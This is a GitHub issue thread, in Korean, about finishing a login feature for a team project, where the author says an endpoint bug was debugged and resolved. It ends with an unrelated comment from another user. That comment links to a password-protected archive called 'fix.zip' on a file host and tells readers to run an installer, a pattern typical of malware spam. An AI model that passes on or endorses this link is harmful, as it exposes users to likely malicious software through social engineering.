### ISSUE TITLE
[feat] 로그인 기능 구현

### ISSUE THREAD

**Issue by knh9612** [sparta-team-sajotuna/aiBusinessProject#10]
## Description ✏️
 로그인 기능 구현 완료하였습니다.
엔드포인트 관련 이슈가 있었는데, 내부 코드 디버깅하면서 에러 위치 확인 후 해결하였습니다.

## To-Do ✅
- [] 로그인 기능 구현 완료
- []

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
